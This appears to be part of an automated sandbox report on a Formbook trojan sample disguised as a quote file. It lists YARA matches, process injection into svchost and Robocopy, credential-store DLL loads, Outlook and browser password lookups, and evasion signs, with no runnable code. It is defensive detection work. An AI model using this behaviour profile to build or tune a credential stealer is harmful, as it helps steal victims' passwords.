            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04809EB04_2_04809EB0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BEEDB4_2_048BEEDB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BEE264_2_048BEE26
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04800E594_2_04800E59
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04801F924_2_04801F92
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFFB14_2_048BFFB1
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480CFE04_2_0480CFE0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFF094_2_048BFF09
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04820F304_2_04820F30
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F2FC84_2_047F2FC8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04874F404_2_04874F40
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048038E04_2_048038E0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0482E8F04_2_0482E8F0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048028404_2_04802840
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0480A8404_2_0480A840
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047E68B84_2_047E68B8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048029A04_2_048029A0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048CA9A64_2_048CA9A6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048099504_2_04809950
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481B9504_2_0481B950
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048169624_2_04816962
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04845AA04_2_04845AA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0489DAAC4_2_0489DAAC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048ADAC64_2_048ADAC6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFA494_2_048BFA49
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B7A464_2_048B7A46
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_04873A6C4_2_04873A6C
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047FEA804_2_047FEA80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0481FB804_2_0481FB80
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048B6BD74_2_048B6BD7
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0483DBF94_2_0483DBF9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BAB404_2_048BAB40
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_048BFB764_2_048BFB76
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00811FA04_2_00811FA0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080D0B04_2_0080D0B0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080B1304_2_0080B130
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008156604_2_00815660
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008138404_2_00813840
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0082BDC04_2_0082BDC0
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080CE874_2_0080CE87
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0080CE904_2_0080CE90
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE7754_2_046BE775
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BD7D84_2_046BD7D8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE2B84_2_046BE2B8
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE3D34_2_046BE3D3
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BCA834_2_046BCA83
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067CA2B87_2_000002D1067CA2B8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067CA7757_2_000002D1067CA775
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067C97D87_2_000002D1067C97D8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067CA3D37_2_000002D1067CA3D3
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_000002D1067C8A837_2_000002D1067C8A83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 96 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04835130 appears 36 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0486EA12 appears 84 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 047EB970 appears 266 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04847E54 appears 88 times
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0487F290 appears 105 times
            Source: Quote #270924.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
            Source: C:\Users\user\Desktop\Quote #270924.exeFile created: C:\Users\user\AppData\Local\Temp\recompleteJump to behavior
            Source: Quote #270924.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Quote #270924.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Robocopy.exe, 00000004.00000002.3985211901.0000000002DBC000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2452999105.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quote #270924.exeReversingLabs: Detection: 36%
            Source: C:\Users\user\Desktop\Quote #270924.exeFile read: C:\Users\user\Desktop\Quote #270924.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Quote #270924.exe "C:\Users\user\Desktop\Quote #270924.exe"
            Source: C:\Users\user\Desktop\Quote #270924.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quote #270924.exe"
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quote #270924.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quote #270924.exe"Jump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quote #270924.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Quote #270924.exeStatic file information: File size 1366661 > 1048576
            Source: Binary string: robocopy.pdb source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HoiWfznxKU.exe, 00000003.00000000.2197455182.000000000057E000.00000002.00000001.01000000.00000004.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344151814.000000000057E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2175621784.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177443732.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000004.00000002.3986503169.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2277774868.000000000460F000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3986503169.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000003.2275494698.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: robocopy.pdbGCTL source: svchost.exe, 00000002.00000003.2241073869.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241073869.000000000083B000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985552449.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: Robocopy.exe, 00000004.00000002.3987313418.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3985211901.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344639138.0000000002A0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2561116373.0000000006A0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Quote #270924.exeStatic PE information: real checksum: 0xa961f should be: 0x158e8d
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D919 push ds; iretd 2_2_0040D91A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F2A2 push esi; iretd 2_2_0041F2AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C4C push edi; iretd 2_2_00416C5E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C53 push edi; iretd 2_2_00416C5E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418505 push ebp; iretd 2_2_00418506
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AD9E push es; iretd 2_2_0041AD9F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004036A0 push eax; ret 2_2_004036A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425743 push edi; iretd 2_2_0042574E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167C3 push ecx; iretd 2_2_004167EA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D7FF push FFFFFFFEh; retf 2_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423F83 push edi; iretd 2_2_00423F8C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_047F09AD push ecx; mov dword ptr [esp], ecx4_2_047F09B6
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008220A0 push edi; iretd 4_2_008220AB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008240D0 push FFFFFFDEh; retf 4_2_0082420F
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00813120 push ecx; iretd 4_2_00813147
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008135A9 push edi; iretd 4_2_008135BB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008135B0 push edi; iretd 4_2_008135BB
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008215CD push FFFFFFC2h; iretd 4_2_008215CF
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008126AF push 00000046h; iretd 4_2_0081275B
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008176FB push es; iretd 4_2_008176FC
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008208DE push edi; iretd 4_2_008208E9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_008208E0 push edi; iretd 4_2_008208E9
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_0081BBFF push esi; iretd 4_2_0081BC08
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_00814E62 push ebp; iretd 4_2_00814E63
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046B5557 pushfd ; retf 4_2_046B555A
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046B15A0 push cs; iretd 4_2_046B15A1
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BE68E push esi; iretd 4_2_046BE68F
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BF74F push ds; iretd 4_2_046BF750
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BF031 push eax; iretd 4_2_046BF034
            Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4_2_046BD216 push 8702727Ah; ret 4_2_046BD21C
            Source: C:\Users\user\Desktop\Quote #270924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Quote #270924.exeAPI/Special instruction interceptor: Address: 41BD6CC
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD1C0 rdtsc 2_2_030AD1C0
            Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 3902Jump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 6070Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\Robocopy.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep count: 3902 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep time: -7804000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep count: 6070 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7652Thread sleep time: -12140000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe TID: 7684Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
